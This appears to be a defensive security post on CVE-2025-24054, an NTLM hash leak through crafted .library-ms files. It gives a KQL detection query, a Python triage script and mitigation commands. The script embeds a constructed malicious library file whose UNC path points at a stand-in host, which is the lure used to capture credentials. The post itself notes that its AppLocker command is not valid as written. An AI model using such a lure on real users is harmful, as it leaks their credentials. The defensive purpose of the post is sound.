A newly discovered vulnerability, CVE-2025-24054, is being actively exploited, allowing attackers to leak NTLM hashes or user passwords via a maliciously crafted `.library-ms` file. Although Microsoft released a patch on March 11, 2025, threat actors had begun leveraging the exploit by March 19, 2025, according to Check Point Research.
🔗 Reference: CVE-2025-24054, NTLM Exploit in the Wild – Check Point Research
You Should Know:
Detection with Defender XDR KQL Query
The following Kusto Query Language (KQL) can help detect potential exploitation attempts via `.library-ms` files:
DeviceFileEvents
| where ActionType == "FileCreated" and FileName endswith ".library-ms"
| where parse_json(AdditionalFields)["FileType"] has "library-ms"
| where InitiatingProcessUniqueId != 0
// correlate the process that created the file with any outbound SMB connection it made
| join DeviceNetworkEvents on InitiatingProcessUniqueId
| where RemotePort == 445 and Protocol == "Tcp"
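The query above keys on the creation of a `.library-ms` file followed by an outbound SMB connection from the same process. A complementary content check, added here as an example and not part of the original post or of Check Point's tooling, parses the file's Library Description XML and flags `<url>` entries that point at a UNC path or `file://` URL on a non-trusted host, so quarantined attachments or share contents can be triaged before a user opens them; the allow list, the sample files and the host addresses are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}  # .library-ms schema namespace
TRUSTED_HOSTS = {"fileserver.corp.example"}  # assumed allow list of legitimate library hosts
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share ; group 1 = host

def remote_targets(xml_bytes: bytes) -> list[str]:
    """Return non-trusted hosts that <url> elements would make Explorer contact
    over SMB (UNC paths or file:// URLs); an empty list means no remote target."""
    root = ET.fromstring(xml_bytes)
    hosts = []
    for url in root.iterfind(".//lib:simpleLocation/lib:url", NS):
        value = (url.text or "").strip()
        host = None
        if m := UNC_RE.match(value):
            host = m.group(1)
        elif value.lower().startswith("file://"):
            host = urlparse(value).hostname  # None for file:///local/path
        if host and host.lower() not in TRUSTED_HOSTS:
            hosts.append(host)
    return hosts

def is_suspicious(xml_bytes: bytes) -> bool:
    """Triage verdict; malformed XML is also flagged for manual review."""
    try:
        return bool(remote_targets(xml_bytes))
    except ET.ParseError:
        return True

# Constructed sample in the documented schema; 192.0.2.10 is an RFC 5737
# documentation address, not an indicator from the Check Point report.
SUSPICIOUS_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\192.0.2.10\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed benign sample: a known-folder reference instead of a remote location.
BENIGN_LIBRARY = SUSPICIOUS_LIBRARY.replace(
    b"\\\\192.0.2.10\\share", b"knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")
```

Run `remote_targets` over every `.library-ms` pulled from a mail quarantine or file share and feed the returned hosts to your block list; the KQL above then confirms whether any endpoint actually reached them.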
Mitigation Steps
1. Apply Microsoft’s March 2025 Patch
- Ensure all Windows systems are updated with the latest security patches.
- Check updates via PowerShell:
# Get-WindowsUpdate comes from the community PSWindowsUpdate module (Install-Module PSWindowsUpdate); it is not a built-in cmdlet
Get-WindowsUpdate -Install -AcceptAll -AutoReboot
2. Disable NTLM if Possible
- Use Group Policy to enforce Kerberos instead:
# Value 5 = "Send NTLMv2 response only. Refuse LM & NTLM": rejects LM and NTLMv1, but NTLMv2 remains available;
# the Group Policy equivalent is "Network security: LAN Manager authentication level"
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5
3. Monitor SMB (Port 445) Traffic
- Use Wireshark or Microsoft Defender for Endpoint to detect suspicious SMB requests.
- Example Wireshark filter:
tcp.port == 445 && smb2
4. Block Malicious `.library-ms` Files
- Deploy AppLocker or Software Restriction Policies (SRP) to prevent execution:
# Note: New-AppLockerPolicy has no -Deny parameter and expects -FileInformation from Get-AppLockerFileInformation;
# a deny rule must be authored in the AppLocker policy XML and applied with Set-AppLockerPolicy -XmlPolicy <file>
New-AppLockerPolicy -RuleType Path -FileInformation ".library-ms" -Deny -User Everyone
5. Enable SMB Signing
- Prevent NTLM relay attacks by enforcing SMB signing:
# Client side (outbound SMB sessions)
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
# Server side (inbound SMB sessions)
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Additional Linux Security Checks
If managing hybrid environments, ensure Linux systems interacting with Windows are secured:
- Check the Samba configuration (/etc/samba/smb.conf) for syntax errors and the effective settings:
testparm -s
- Audit NTLM authentication attempts on Linux:
journalctl -u smbd --grep "NTLM"
What Undercode Says
This exploit highlights the risks of legacy authentication protocols like NTLM. Organizations must:
✔ Patch immediately – Delays increase exposure.
✔ Enforce modern auth – Kerberos or certificate-based auth should replace NTLM.
✔ Monitor file creation – Unusual `.library-ms` files can indicate an exploitation attempt.
✔ Segment networks – Limit SMB (port 445) traffic to trusted zones.
Expected Output:
- Detection alerts for `.library-ms` file creation.
- Blocked NTLM relay attempts via SMB signing.
- Reduced attack surface through NTLM deprecation.
Reported By: 0x534c Cybersecurity – Hackers Feeds